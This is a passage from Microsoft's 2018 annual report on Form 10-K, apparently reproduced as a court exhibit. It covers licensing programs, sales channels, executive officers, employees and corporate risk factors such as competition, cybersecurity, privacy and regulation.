We also sell commercial and consumer products and services directly to customers, such as cloud services, search, and gaming, through our digital marketplaces, online stores, and retail stores.

### Distributors and Resellers

Organizations also license our products and services indirectly, primarily through licensing solution partners ("LSP"), distributors, value-added resellers ("VAR"), and retailers. Although each type of reselling partner may reach organizations of all sizes, LSPs are primarily engaged with large organizations, distributors resell primarily to VARs, and VARs typically reach small and medium organizations. ESAs are also typically authorized as LSPs and operate as resellers for our other volume licensing programs. Microsoft Cloud Solution Provider is our main partner program for reselling cloud services.

We distribute our retail packaged products primarily through independent non-exclusive distributors, authorized replicators, resellers, and retail outlets. Individual consumers obtain these products primarily through retail outlets. We distribute our devices through third-party retailers. We have a network of field sales representatives and field support personnel that solicit orders from distributors and resellers, and provide product training and sales support.

Our Dynamics business solutions are also licensed to enterprises through a global network of channel partners providing vertical solutions and specialized services.

## LICENSING OPTIONS

We offer options for organizations that want to purchase our cloud services, on-premises software, and Software Assurance. We license software to organizations under volume licensing agreements to allow the customer to acquire multiple licenses of products and services instead of having to acquire separate licenses through retail channels. We use different programs designed to provide flexibility for organizations of various sizes. While these programs may differ in various parts of the world, generally they include those discussed below.

SA conveys rights to new software and upgrades for perpetual licenses released over the contract period. It also provides support, tools, and training to help customers deploy and use software efficiently. SA is included with certain volume licensing agreements and is an optional purchase with others.

## Volume Licensing Programs

### Enterprise Agreement

Enterprise Agreements offer large organizations a manageable volume licensing program that gives them the flexibility to buy cloud services and software licenses under one agreement. Enterprise Agreements are designed for medium or large organizations that want to license cloud services and on-premises software organization-wide over a three-year period. Organizations can elect to purchase perpetual licenses or subscribe to licenses. SA is included.

### Microsoft Product and Services Agreement

Microsoft Product and Services Agreements are designed for medium and large organizations that want to license cloud services and on-premises software as needed, with no organization-wide commitment, under a single, non-expiring agreement. Organizations purchase perpetual licenses or subscribe to licenses. SA is optional for customers that purchase perpetual licenses.

### Open

Open agreements are a simple, cost-effective way to acquire the latest Microsoft technology. Open agreements are designed for small and medium organizations that want to license cloud services and on-premises software over a one- to three-year period. Under the Open agreements, organizations purchase perpetual licenses and SA is optional. Under Open Value agreements, organizations can elect to purchase perpetual licenses or subscribe to licenses and SA is included.

### Select Plus

Select Plus agreements are designed for government and academic organizations to acquire on-premises licenses at any affiliate or department level, while realizing advantages as one organization. Organizations purchase perpetual licenses and SA is optional.

In July 2014, we announced the retirement over a two-year period of Select Plus agreements for commercial organizations. Beginning July 2015, no new Select Plus agreements were signed with commercial organizations.

### Microsoft Online Subscription Agreement

Microsoft Online Subscription Agreements are designed for small and medium organizations that want to subscribe to, activate, provision, and maintain cloud services seamlessly and directly via the web. The agreement allows customers to acquire monthly or annual subscriptions for cloud-based services.

## Partner Programs

The Microsoft Cloud Solution Provider program offers customers an easy way to license the cloud services they need in combination with the value-added services offered by their systems integrator, hosting partner, or cloud reseller partner. Partners in this program can easily package their own products and services to directly provision, manage, and support their customer subscriptions.

The Microsoft Services Provider License Agreement allows service providers and independent software vendors who want to license eligible Microsoft software products to provide software services and hosted applications to their end customers. Partners license software over a three-year period and are billed monthly based on consumption.

The Independent Software Vendor Royalty program enables partners to integrate Microsoft products into other applications and then license the unified business solution to their end users.

## CUSTOMERS

Our customers include individual consumers, small and medium organizations, large global enterprises, public-sector institutions, internet service providers, application developers, and OEMs. No sales to an individual customer accounted for more than 10% of revenue in fiscal years 2018, 2017, or 2016. Our practice is to ship our products promptly upon receipt of purchase orders from customers; consequently, backlog is not significant.

## EXECUTIVE OFFICERS OF THE REGISTRANT

Our executive officers as of August 3, 2018 were as follows:

| Name | Age | Position with the Company |
|------|-----|---------------------------|
| Satya Nadella | 50 | Chief Executive Officer |
| Christopher C. Capossela | 48 | Executive Vice President, Marketing and Consumer Business, and Chief Marketing Officer |
| Jean-Philippe Courtois | 57 | Executive Vice President and President, Microsoft Global Sales, Marketing and Operations |
| Kathleen T. Hogan | 52 | Executive Vice President, Human Resources |
| Amy E. Hood | 46 | Executive Vice President, Chief Financial Officer |
| Margaret L. Johnson | 56 | Executive Vice President, Business Development |
| Bradford L. Smith | 59 | President and Chief Legal Officer |

Mr. Nadella was appointed Chief Executive Officer in February 2014. He served as Executive Vice President, Cloud and Enterprise from July 2013 until that time. From 2011 to 2013, Mr. Nadella served as President, Server and Tools. From 2009 to 2011, he was Senior Vice President, Online Services Division. From 2008 to 2009, he was Senior Vice President, Search, Portal, and Advertising. Since joining Microsoft in 1992, Mr. Nadella's roles also included Vice President of the Business Division. Mr. Nadella also serves on the Board of Directors of Starbucks Corporation.

Mr. Capossela was appointed Executive Vice President, Marketing and Consumer Business, and Chief Marketing Officer in July 2016. He had served as Executive Vice President, Chief Marketing Officer since March 2014. Previously, he served as the worldwide leader of the Consumer Channels Group, responsible for sales and marketing activities with OEMs, operators, and retail partners. In his more than 25 years at Microsoft, Mr. Capossela has held a variety of marketing leadership roles in the Microsoft Office Division. He was responsible for marketing productivity solutions including Microsoft Office, Office 365, SharePoint, Exchange, Skype for Business, Project, and Visio.

Mr. Courtois was named Executive Vice President and President, Microsoft Global Sales, Marketing and Operations in July 2016. Before that he was President of Microsoft International since 2005. He was Chief Executive Officer, Microsoft Europe, Middle East, and Africa from 2003 to 2005. He was Senior Vice President and President, Microsoft Europe, Middle East, and Africa from 2000 to 2003. He was Corporate Vice President, Worldwide Customer Marketing from 1998 to 2000. Mr. Courtois joined Microsoft in 1984.

Ms. Hogan was appointed Executive Vice President, Human Resources in November 2014. Prior to that Ms. Hogan was Corporate Vice President of Microsoft Services. She also served as Corporate Vice President of Customer Service and Support. Ms. Hogan joined Microsoft in 2003.

Ms. Hood was appointed Executive Vice President and Chief Financial Officer in July 2013, subsequent to her appointment as Chief Financial Officer in May 2013. From 2010 to 2013, Ms. Hood was Chief Financial Officer of the Microsoft Business Division. From 2006 through 2009, Ms. Hood was General Manager, Microsoft Business Division Strategy. Since joining Microsoft in 2002, Ms. Hood has held finance-related positions in the Server and Tools Business and the corporate finance organization. Ms. Hood also serves on the Board of Directors of 3M Corporation.

Ms. Johnson was appointed Executive Vice President, Business Development in September 2014. Prior to that Ms. Johnson spent 24 years at Qualcomm in various leadership positions across engineering, sales, marketing and business development. She most recently served as Executive Vice President of Qualcomm Technologies, Inc. Ms. Johnson also serves on the Board of Directors of BlackRock, Inc.

Mr. Smith was appointed President and Chief Legal Officer in September 2015. He served as Executive Vice President, General Counsel, and Secretary from 2011 to 2015, and served as Senior Vice President, General Counsel, and Secretary from 2001 to 2011. Mr. Smith was also named Chief Compliance Officer in 2002. Since joining Microsoft in

1993, he was Deputy General Counsel for Worldwide Sales and previously was responsible for managing the European Law and Corporate Affairs Group, based in Paris. Mr. Smith also serves on the Board of Directors of Netflix, Inc.

## EMPLOYEES

As of June 30, 2018, we employed approximately 131,000 people on a full-time basis, 78,000 in the U.S. and 53,000 internationally. Of the total employed people, 42,000 were in operations, including manufacturing, distribution, product support, and consulting services; 42,000 were in product research and development; 36,000 were in sales and marketing; and 11,000 were in general and administration. Certain of our employees are subject to collective bargaining agreements.

## AVAILABLE INFORMATION

Our Internet address is www.microsoft.com. At our Investor Relations website, www.microsoft.com/investor, we make available free of charge a variety of information for investors. Our goal is to maintain the Investor Relations website as a portal through which investors can easily find or navigate to pertinent information about us, including:

- Our annual report on Form 10-K, quarterly reports on Form 10-Q, current reports on Form 8-K, and any amendments to those reports, as soon as reasonably practicable after we electronically file that material with or furnish it to the Securities and Exchange Commission ("SEC").
- Information on our business strategies, financial results, and metrics for investors.
- Announcements of investor conferences, speeches, and events at which our executives talk about our product, service, and competitive strategies. Archives of these events are also available.
- Press releases on quarterly earnings, product and service announcements, legal developments, and international news.
- Corporate governance information including our articles of incorporation, bylaws, governance guidelines, committee charters, codes of conduct and ethics, global corporate social responsibility initiatives, and other governance-related policies.
- Other news and announcements that we may post from time to time that investors might find useful or interesting.
- Opportunities to sign up for email alerts to have information pushed in real time.

The information found on our website is not part of this or any other report we file with, or furnish to, the SEC. In addition to these channels, we use social media to communicate to the public. It is possible that the information we post on social media could be deemed to be material to investors. We encourage investors, the media, and others interested in Microsoft to review the information we post on the social media channels listed on our Investor Relations website.

# ITEM 1A. RISK FACTORS

Our operations and financial results are subject to various risks and uncertainties, including those described below, that could adversely affect our business, financial condition, results of operations, cash flows, and the trading price of our common stock.

**We face intense competition across all markets for our products and services, which may lead to lower revenue or operating margins.**

*Competition in the technology sector*

Our competitors range in size from diversified global companies with significant research and development resources to small, specialized firms whose narrower product lines may let them be more effective in deploying technical, marketing, and financial resources. Barriers to entry in many of our businesses are low and many of the areas in which we compete evolve rapidly with changing and disruptive technologies, shifting user needs, and frequent introductions of new products and services. Our ability to remain competitive depends on our success in making innovative products, devices, and services that appeal to businesses and consumers.

*Competition among platform-based ecosystems*

An important element of our business model has been to create platform-based ecosystems on which many participants can build diverse solutions. A well-established ecosystem creates beneficial network effects among users, application developers, and the platform provider that can accelerate growth. Establishing significant scale in the marketplace is necessary to achieve and maintain attractive margins. We face significant competition from firms that provide competing platforms.

- A competing vertically-integrated model, in which a single firm controls the software and hardware elements of a product and related services, has succeeded with some consumer products such as personal computers, tablets, phones, gaming consoles, and wearables. Competitors pursuing this model also earn revenue from services integrated with the hardware and software platform, including applications and content sold through their integrated marketplaces. They may also be able to claim security and performance benefits from their vertically integrated offer. We also offer some vertically-integrated hardware and software products and services. To the extent we shift a portion of our business to a vertically integrated model we increase our cost of revenue and reduce our operating margins.

- We derive substantial revenue from licenses of Windows operating systems on personal computers. We face significant competition from competing platforms developed for new devices and form factors such as smartphones and tablet computers. These devices compete on multiple bases including price and the perceived utility of the device and its platform. Users are increasingly turning to these devices to perform functions that in the past were performed by personal computers. Even if many users view these devices as complementary to a personal computer, the prevalence of these devices may make it more difficult to attract application developers to our PC operating system platforms. Competing with operating systems licensed at low or no cost may decrease our PC operating system margins. Popular products or services offered on competing platforms could increase their competitive strength. In addition, some of our devices compete with products made by our original equipment manufacturer ("OEM") partners, which may affect their commitment to our platform.

- Competing platforms have content and application marketplaces with scale and significant installed bases. The variety and utility of content and applications available on a platform are important to device purchasing decisions. Users sometimes incur costs to move data and buy new content and applications when switching platforms. To compete, we must successfully enlist developers to write applications for our platform and ensure that these applications have high quality, security, customer appeal, and value. Efforts to compete with competitors' content and application marketplaces may increase our cost of revenue and lower our operating margins.

*Business model competition*

Companies compete with us based on a growing variety of business models.

- Even as we transition more of our business to infrastructure-, platform-, and software-as-a-service business model, the license-based proprietary software model generates a substantial portion of our software revenue. We bear the costs of converting original ideas into software products through investments in research and development, offsetting these costs with the revenue received from licensing our products. Many of our competitors also develop and sell software to businesses and consumers under this model.

- Other competitors develop and offer free applications, online services and content, and make money by selling third-party advertising. Advertising revenue funds development of products and services these competitors provide to users at no or little cost, competing directly with our revenue-generating products.

- Some companies compete with us using an open source business model by modifying and then distributing open source software at nominal cost to end-users, and earning revenue on advertising or complementary services and products. These firms do not bear the full costs of research and development for the software. Some open source software vendors develop software that mimics the features and functionality of our products.

The competitive pressures described above may cause decreased sales volumes, price reductions, and/or increased operating costs, such as for research and development, marketing, and sales incentives. This may lead to lower revenue, gross margins, and operating income.

**Our increasing focus on cloud-based services presents execution and competitive risks.** A growing part of our business involves cloud-based services available across the spectrum of computing devices. Our strategic vision is to compete and grow by building best-in-class platforms and productivity services for an intelligent cloud and an intelligent edge infused with artificial intelligence ("AI"). At the same time, our competitors are rapidly developing and deploying cloud-based services for consumers and business customers. Pricing and delivery models are evolving. Devices and form factors influence how users access services in the cloud and sometimes the user's choice of which suite of cloud-based services to use. We are devoting significant resources to develop and deploy our cloud-based strategies. The Windows ecosystem must continue to evolve with this changing environment. We are undertaking cultural and organizational changes to drive accountability and eliminate obstacles to innovation. Our intelligent cloud and intelligent edge worldview is connected with the growth of the internet of things ("IoT"). Our success in the IoT will depend on the level of adoption of our offerings such as Microsoft Azure, Azure Stack, Azure IoT Edge, and Azure Sphere. We may not establish market share sufficient to achieve scale necessary to achieve our business objectives.

Besides software development costs, we are incurring costs to build and maintain infrastructure to support cloud computing services. These costs will reduce the operating margins we have previously achieved. Whether we succeed in cloud-based services depends on our execution in several areas, including:

- Continuing to bring to market compelling cloud-based experiences that generate increasing traffic and market share.

- Maintaining the utility, compatibility, and performance of our cloud-based services on the growing array of computing devices, including PCs, smartphones, tablets, gaming consoles, and other devices, as well as sensors and other endpoints.

- Continuing to enhance the attractiveness of our cloud platforms to third-party developers.

- Ensuring our cloud-based services meet the reliability expectations of our customers and maintain the security of their data.

- Making our suite of cloud-based services platform-agnostic, available on a wide range of devices and ecosystems, including those of our competitors.

It is uncertain whether our strategies will attract the users or generate the revenue required to succeed. If we are not effective in executing organizational and technical changes to increase efficiency and accelerate innovation, or if we fail to generate sufficient usage of our new products and services, we may not grow revenue in line with the infrastructure and development investments described above. This may negatively impact gross margins and operating income.

**We make significant investments in new products and services that may not achieve expected returns.** We will continue to make significant investments in research, development, and marketing for existing products, services, and technologies, including the Windows operating system, Microsoft 365, Office, Bing, Microsoft SQL Server, Windows Server, the Windows Store, Azure, Office 365, Xbox Live, Mixer, LinkedIn, and other cloud-based offerings. We also invest in the development and acquisition of a variety of hardware for productivity, communication, and entertainment including PCs, tablets, gaming devices, and HoloLens. Investments in new technology are speculative. Commercial success depends on many factors, including innovativeness, developer support, and effective distribution and marketing. If customers do not perceive our latest offerings as providing significant new functionality or other value, they may reduce their purchases of new software and hardware products or upgrades, unfavorably affecting revenue. We may not achieve significant revenue from new product, service, and distribution channel investments for several years, if at all. New products and services may not be profitable, and even if they are profitable, operating margins for some new products and businesses will not be as high as the margins we have experienced historically. We may not get engagement in certain features, like Windows Store, Microsoft Edge, and Bing, that drive post-license monetization opportunities. Our data handling practices across our products and services will continue to be under scrutiny and perceptions of mismanagement, driven by regulatory activity or negative public reaction to our practices or product experiences, which could negatively impact product and feature adoption, product design, and product quality.

Developing new technologies is complex. It can require long development and testing periods. Significant delays in new releases or significant problems in creating new products or services could adversely affect our revenue.

**Acquisitions, joint ventures, and strategic alliances may have an adverse effect on our business.** We expect to continue making acquisitions and entering into joint ventures and strategic alliances as part of our long-term business strategy. In December 2016, we completed our acquisition of LinkedIn Corporation for $27.0 billion. In June 2018, we announced an agreement to acquire GitHub, Inc. for $7.5 billion. These acquisitions and other transactions and arrangements involve significant challenges and risks, including that they do not advance our business strategy, that we get an unsatisfactory return on our investment, that we have difficulty integrating and retaining new employees, business systems, and technology, or that they distract management from our other businesses. If an arrangement fails to adequately anticipate changing circumstances and interests of a party, it may result in early termination or renegotiation of the arrangement. The success of these transactions and arrangements will depend in part on our ability to leverage them to enhance our existing products and services or develop compelling new ones. It may take longer than expected to realize the full benefits from these transactions and arrangements, such as increased revenue, enhanced efficiencies, or increased market share, or the benefits may ultimately be smaller than we expected. These events could adversely affect our operating results or financial condition.

**If our goodwill or amortizable intangible assets become impaired, we may be required to record a significant charge to earnings.** We acquire other companies and intangible assets and may not realize all the economic benefit from those acquisitions, which could cause an impairment of goodwill or intangibles. We review our amortizable intangible assets for impairment when events or changes in circumstances indicate the carrying value may not be recoverable. We test goodwill for impairment at least annually. Factors that may be a change in circumstances, indicating that the carrying value of our goodwill or amortizable intangible assets may not be recoverable, include a decline in our stock price and market capitalization, reduced future cash flow estimates, and slower growth rates in industry segments in which we participate. We have in the past recorded, and may in the future be required to record a significant charge in our consolidated financial statements during the period in which any impairment of our goodwill or amortizable intangible assets is determined, negatively affecting our results of operations. Our acquisition of LinkedIn resulted in a significant increase in our goodwill and intangible asset balances.

**We may not earn the revenues we expect from our intellectual property rights.**

*We may not be able to adequately protect our intellectual property rights*

Protecting our intellectual property rights and combating unlicensed copying and use of our software and other intellectual property on a global basis is difficult. While piracy adversely affects U.S. revenue, the impact on revenue from outside the U.S. is more significant, particularly countries in which the legal system provides less protection for intellectual property rights. Our revenue in these markets may grow more slowly than the underlying device market. Similarly, the absence of harmonized patent laws makes it more difficult to ensure consistent respect for patent rights. Throughout the world, we educate users about the benefits of licensing genuine products and obtaining indemnification benefits for intellectual property risks, and we educate lawmakers about the advantages of a business climate where intellectual property rights are protected. Reductions in the legal protection for software intellectual property rights could adversely affect revenue.

***We may not receive expected royalties from our patent licenses***

We expend significant resources to patent the intellectual property we create with the expectation that we will generate revenues by incorporating that intellectual property in our products or services or, in some instances, by licensing our patents to others in return for a royalty. Changes in the law may continue to weaken our ability to prevent the use of patented technology or collect revenue for licensing our patents. These include legislative changes and regulatory actions that make it more difficult to obtain injunctions, and the increasing use of legal process to challenge issued patents. Similarly, licensees of our patents may fail to satisfy their obligations to pay us royalties, or may contest the scope and extent of their obligations. Finally, the royalties we can obtain to monetize our intellectual property may decline because of the evolution of technology, selling price changes in products using licensed patents, or the difficulty of discovering infringements. Finally, our increasing engagement with open source software will also cause us to license our intellectual property rights broadly in certain situations and may negatively impact revenue.

**Third parties may claim we infringe their intellectual property rights.** From time to time, others claim we infringe their intellectual property rights. The number of these claims may grow because of constant technological change in the markets in which we compete, the extensive patent coverage of existing technologies, the rapid rate of issuance of new patents, and our offering of first-party devices, such as Microsoft Surface. To resolve these claims, we may enter into royalty and licensing agreements on terms that are less favorable than currently available, stop selling or redesign affected products or services, or pay damages to satisfy indemnification commitments with our customers. These outcomes may cause operating margins to decline. Besides money damages, in some jurisdictions plaintiffs can seek injunctive relief that may limit or prevent importing, marketing, and selling our products or services that have infringing technologies. In some countries, such as Germany, an injunction can be issued before the parties have fully litigated the validity of the underlying patents. We have paid significant amounts to settle claims related to the use of technology and intellectual property rights and to procure intellectual property rights as part of our strategy to manage this risk, and may continue to do so.

**We may not be able to protect our source code from copying if there is an unauthorized disclosure.** Source code, the detailed program commands for our operating systems and other software programs, is critical to our business. Although we license portions of our application and operating system source code to several licensees, we take significant measures to protect the secrecy of large portions of our source code. If our source code leaks, we might lose future trade secret protection for that code. It may then become easier for third parties to compete with our products by copying functionality, which could adversely affect our revenue and operating margins. Unauthorized disclosure of source code also could increase the security risks described in the next paragraph.

**Cyberattacks and security vulnerabilities could lead to reduced revenue, increased costs, liability claims, or harm to our reputation or competitive position.**

***Security of our information technology***

Threats to IT security can take a variety of forms. Individual and groups of hackers and sophisticated organizations, including state-sponsored organizations or nation-states, continuously undertake attacks that pose threats to our customers and our IT. These actors may use a wide variety of methods, which may include developing and deploying malicious software or exploiting vulnerabilities in hardware, software, or other infrastructure in order to attack our products and services or gain access to our networks and datacenters, using social engineering techniques to induce our employees, users, partners, or customers to disclose passwords or other sensitive information or take other actions to gain access to our data or our users' or customers' data, or acting in a coordinated manner to launch distributed denial of service or other coordinated attacks. Inadequate account security practices may also result in unauthorized access to confidential data. For example, system administrators may fail to timely remove employee account access when no longer appropriate. Employees or third parties may intentionally compromise our or our users' security or systems, or reveal confidential information.

Cyberthreats are constantly evolving, increasing the difficulty of detecting and successfully defending against them. We may have no current capability to detect certain vulnerabilities, which may allow them to persist in the environment over long periods of time. Cyberthreats can have cascading impacts that unfold with increasing speed across our internal networks and systems and those of our partners and customers. Breaches of our facilities, network, or data security could disrupt the security of our systems and business applications, impair our ability to provide services to our customers and protect the privacy of their data, result in product development delays, compromise confidential or technical business information harming our reputation or competitive position, result in theft or misuse of our intellectual property or other assets, require us to allocate more resources to improved technologies, or otherwise adversely affect our business.

In addition, our internal IT environment continues to evolve. Often, we are early adopters of new devices and technologies. We embrace new ways of sharing data and communicating internally and with partners and customers using methods such as social networking and other consumer-oriented technologies. Our business policies and internal security controls may not keep pace with these changes as new threats emerge.

### Security of our products, services, devices, and customers' data

The security of our products and services is important in our customers' decisions to purchase or use our products or services. Security threats are a significant challenge to companies like us whose business is providing technology products and services to others. Threats to our own IT infrastructure can also affect our customers. Customers using our cloud-based services rely on the security of our infrastructure, including hardware and other elements provided by third parties, to ensure the reliability of our services and the protection of their data. Adversaries tend to focus their efforts on the most popular operating systems, programs, and services, including many of ours, and we expect that to continue. Adversaries that acquire user account information at other companies can use that information to compromise our users' accounts where accounts share the same attributes like passwords. Inadequate account security practices may also result in unauthorized access. We are also increasingly incorporating open source software into our products. There may be vulnerabilities in open source software that may make our products susceptible to cyberattacks.

To defend against security threats to our internal IT systems, our cloud-based services, and our customers' systems, we must continuously engineer more secure products and services, enhance security and reliability features, improve the deployment of software updates to address security vulnerabilities in our own products as well as those provided by others, develop mitigation technologies that help to secure customers from attacks even when software updates are not deployed, maintain the digital security infrastructure that protects the integrity of our network, products, and services, and provide customers security tools such as firewalls and anti-virus software and information about the need to deploy security measures and the impact of doing so.

The cost of these steps could reduce our operating margins. If we fail to do these things well, actual or perceived security vulnerabilities in our products and services, data corruption issues, or reduced performance could harm our reputation and lead customers to reduce or delay future purchases of products or subscriptions to services, or to use competing products or services. Customers may also spend more on protecting their existing computer systems from attack, which could delay adoption of additional products or services. Customers may fail to update their systems, continue to run software or operating systems we no longer support, or may fail timely to install or enable security patches. Any of these actions by customers could adversely affect our reputation and revenue. Actual or perceived vulnerabilities may lead to claims against us. Our license agreements typically contain provisions that eliminate or limit our exposure to liability, but there is no assurance these provisions will withstand legal challenges. At times, to achieve commercial objectives, we may enter into agreements with larger liability exposure to customers.

As illustrated by the recent Spectre and Meltdown threats, our products operate in conjunction with and are dependent on products and components across a broad ecosystem. If there is a security vulnerability in one of these components, and if there is a security exploit targeting it, we could face increased costs, liability claims, reduced revenue, or harm to our reputation or competitive position.

Case 0:20-cv-60416-XXXX   Document 3-35 Entered on FLSB Docket 02/26/2020   Page 478 of 726
Case 0:20-cv-60416-XXXX   Document 3-35 Entered on FLSB Docket 02/26/2020   Page 22 of 726

PART I
Item 1A

**Disclosure and misuse of personal data could result in liability and harm our reputation.** As we continue to grow the number and scale of our cloud-based offerings, we store and process increasingly large amounts of personally identifiable information of our customers and users. The continued occurrence of high-profile data breaches provides evidence of an external environment increasingly hostile to information security. Despite our efforts to improve the security controls across our business groups and geographies, it is possible our security controls over personal data, our training of employees and vendors on data security, and other practices we follow may not prevent the improper disclosure of customer or user data we or our vendors store and manage. In addition, third parties who have limited access to our customer or user data may use this data in unauthorized ways. Improper disclosure or misuse could harm our reputation, lead to legal exposure to customers or users, or subject us to liability under laws that protect personal data, resulting in increased costs or loss of revenue. Our software products and services also enable our customers and users to store and process personal data on-premises or, increasingly, in a cloud-based environment we host. Government authorities can sometimes require us to produce customer or user data in response to valid legal orders. In the U.S. and elsewhere, we advocate for transparency concerning these requests and appropriate limitations on government authority to compel disclosure. Despite our efforts to protect customer and user data, perceptions that the collection, use, and retention of personal information is not satisfactorily protected could inhibit sales of our products or services, and could limit adoption of our cloud-based solutions by consumers, businesses, and government entities. Additional security measures we may take to address customer or user concerns, or constraints on our flexibility to determine where and how to operate datacenters in response to customer or user expectations or governmental rules or actions, may cause higher operating expenses or hinder growth of our products and services.

**We may not be able to protect information in our products and services from use by others**. LinkedIn and other Microsoft products and services contain valuable information and content protected by contractual restrictions or technical measures. In certain cases, we have made commitments to our members and users to limit access to or use of this information. Changes in the law or interpretations of the law may weaken our ability to prevent third parties from scraping or gathering information or content through use of bots or other measures and using it for their own benefit, thus diminishing the value of our products and services.

**Abuse of our advertising or social platforms may harm our reputation or user engagement.** For LinkedIn, Bing Ads, and other products and services that provide content or host ads that come from or can be influenced by third parties, our reputation or user engagement may be negatively affected by activity that is hostile or inappropriate to other people, by users impersonating other people or organizations, by use of our products or services to disseminate information that may be viewed as misleading or intended to manipulate the opinions of our users, or by the use of our products or services that violates our terms of service or otherwise for objectionable or illegal ends. Preventing these actions may require us to make substantial investments in people and technology and these investments may not be successful, adversely affecting our business and financial results.

**We may have excessive outages, data losses, and disruptions of our online services if we fail to maintain an adequate operations infrastructure.** Our increasing user traffic, growth in services, and the complexity of our products and services demand more computing power. We spend substantial amounts to build, purchase, or lease datacenters and equipment and to upgrade our technology and network infrastructure to handle more traffic on our websites and in our datacenters. These demands continue to increase as we introduce new products and services and support the growth of existing services such as Bing, Exchange Online, Azure, Microsoft account services, Office 365, OneDrive, SharePoint Online, Skype, Xbox Live, Outlook.com, and Windows Stores. We are rapidly growing our business of providing a platform and back-end hosting for services provided by third parties to their end users. Maintaining, securing, and expanding this infrastructure is expensive and complex. It requires that we maintain an Internet connectivity infrastructure that is robust and reliable within competitive and regulatory constraints that continue to evolve. Inefficiencies or operational failures, including temporary or permanent loss of customer data or insufficient Internet connectivity, could diminish the quality of our products, services, and user experience resulting in contractual liability, claims by customers and other third parties, regulatory actions, damage to our reputation, and loss of current and potential users, subscribers, and advertisers, each of which may harm our operating results and financial condition.

**Government litigation and regulatory activity relating to competition rules may limit how we design and market our products.** As a leading global software and device maker, government agencies closely scrutinize us under U.S. and foreign competition laws. An increasing number of governments are actively enforcing competition laws and regulations and this includes increased scrutiny in potentially large markets such as the European Union ("EU"), the U.S., and China. Some jurisdictions also allow competitors or consumers to assert claims of anti-competitive conduct. U.S. federal and state antitrust authorities have previously brought enforcement actions and continue to scrutinize our business.

The European Commission ("the Commission") closely scrutinizes the design of high-volume Microsoft products and the terms on which we make certain technologies used in these products, such as file formats, programming interfaces, and protocols, available to other companies. Flagship product releases such as Windows 10 can receive significant scrutiny under competition laws. For example, in 2004, the Commission ordered us to create new versions of our Windows operating system that do not include certain multimedia technologies and to provide our competitors with specifications for how to implement certain proprietary Windows communications protocols in their own products. In 2009, the Commission accepted a set of commitments we offered to address the Commission's concerns relating to competition in web browsing software, including an undertaking to address Commission concerns relating to interoperability. The web browsing commitments expired in 2014. The remaining obligations may limit our ability to innovate in Windows or other products in the future, diminish the developer appeal of the Windows platform, and increase our product development costs. The availability of licenses related to protocols and file formats may enable competitors to develop software products that better mimic the functionality of our products, which could hamper sales of our products.

Our portfolio of first-party devices continues to grow; at the same time our OEM partners offer a large variety of devices on our platforms. As a result, increasingly we both cooperate and compete with our OEM partners, creating a risk that we fail to do so in compliance with competition rules. Regulatory scrutiny in this area may increase. Certain foreign governments, particularly in China and other countries in Asia, have advanced arguments under their competition laws that exert downward pressure on royalties for our intellectual property.

Government regulatory actions and court decisions such as these may result in fines, or hinder our ability to provide the benefits of our software to consumers and businesses, reducing the attractiveness of our products and the revenue that come from them. New competition law actions could be initiated, potentially using previous actions as precedent. The outcome of such actions, or steps taken to avoid them, could adversely affect us in a variety of ways, including:

- We may have to choose between withdrawing products from certain geographies to avoid fines or designing and developing alternative versions of those products to comply with government rulings, which may entail a delay in a product release and removing functionality that customers want or on which developers rely.

- We may be required to make available licenses to our proprietary technologies on terms that do not reflect their fair market value or do not protect our associated intellectual property.

- We are subject to a variety of ongoing commitments because of court or administrative orders, consent decrees, or other voluntary actions we have taken. If we fail to comply with these commitments, we may incur litigation costs and be subject to substantial fines or other remedial actions.

- Our ability to realize anticipated Windows 10 post-sale monetization opportunities may be limited.

**Our global operations subject us to potential liability under anti-corruption, trade protection, and other laws and regulations.** The Foreign Corrupt Practices Act and other anti-corruption laws and regulations ("Anti-Corruption Laws") prohibit corrupt payments by our employees, vendors, or agents. From time to time, we receive inquiries from authorities in the U.S. and elsewhere and reports from employees and others about our business activities outside the U.S. and our compliance with Anti-Corruption Laws. Specifically, we have been cooperating with authorities in the U.S. in connection with reports concerning our compliance with the Foreign Corrupt Practices Act in various countries. Most countries in which we operate also have competition laws that prohibit competitors from colluding or otherwise attempting to reduce competition between themselves. While we devote substantial resources to our global compliance programs and have implemented policies, training, and internal controls designed to reduce the risk of corrupt payments and collusive activity, our employees, vendors, or agents may violate our policies. Our failure to comply with Anti-Corruption Laws or competition laws could result in significant fines and penalties, criminal sanctions against us, our officers, or our employees, prohibitions on the conduct of our business, and damage to our reputation. Operations outside the U.S. may be affected by changes in trade protection laws, policies, and measures, sanctions, and other regulatory requirements affecting trade and investment. We may be subject to legal liability and reputational damage if we sell goods or services in violation of U.S. trade sanctions on countries such as Iran, North Korea, Cuba, Sudan, and Syria.

Other regulatory areas that may apply to our products and online services offerings include user privacy, telecommunications, data storage and protection, and online content. For example, regulators may take the position that our offerings such as Skype are covered by existing laws regulating telecommunications services and new laws may define more of our services as regulated telecommunications services. Data protection authorities may assert that our collection, use, and management of customer data is inconsistent with their laws and regulations. Legislative or regulatory action relating cybersecurity requirements may increase the costs to develop, implement, or secure our products and services. Legislative or regulatory action could also emerge in the area of AI, increasing costs or

restricting opportunity. Applying these laws and regulations to our business is often unclear, subject to change over time, and sometimes may conflict from jurisdiction to jurisdiction. Additionally, these laws and governments' approach to their enforcement, and our products and services, are continuing to evolve. Compliance with these types of regulation may involve significant costs or require changes in products or business practices that result in reduced revenue. Noncompliance could result in the imposition of penalties or orders we stop the alleged noncompliant activity.

We strive to empower all people and organizations to achieve more, and accessibility of our products is an important aspect of this goal. There is increasing pressure from advocacy groups, regulators, competitors, and customers to make technology more accessible. If our products do not meet customer expectations or emerging global accessibility requirements, we could lose sales opportunities or face regulatory actions

**Laws and regulations relating to the handling of personal data may impede the adoption of our services or result in increased costs, legal claims, fines against us, or reputational damage.** The growth of our Internet- and cloud-based services internationally relies increasingly on the movement of data across national boundaries. Legal requirements relating to the collection, storage, handling, and transfer of personal data continue to evolve. For example, the EU and the U.S. formally entered into a new framework in July 2016 that provides a mechanism for companies to transfer data from EU member states to the U.S. This framework, called the Privacy Shield, is intended to address shortcomings identified by the European Court of Justice in a predecessor mechanism. The Privacy Shield and other mechanisms are currently subject to challenges in European courts, which may lead to uncertainty about the legal basis for data transfers across the Atlantic. The Privacy Shield and other potential rules on the flow of data across borders could increase the cost and complexity of delivering our products and services in some markets. In May 2018, a new EU law governing data practices and privacy, the General Data Protection Regulation ("GDPR"), became effective. The law, which applies to all of our activities conducted from an establishment in the EU or related to products and services offered in the EU, imposes a range of new compliance obligations regarding the handling of personal data. Engineering efforts to build new capabilities to facilitate compliance with the law have entailed substantial expense and the diversion of engineering resources from other projects and may continue to do so. We might experience reduced demand for our offerings if we are unable to engineer 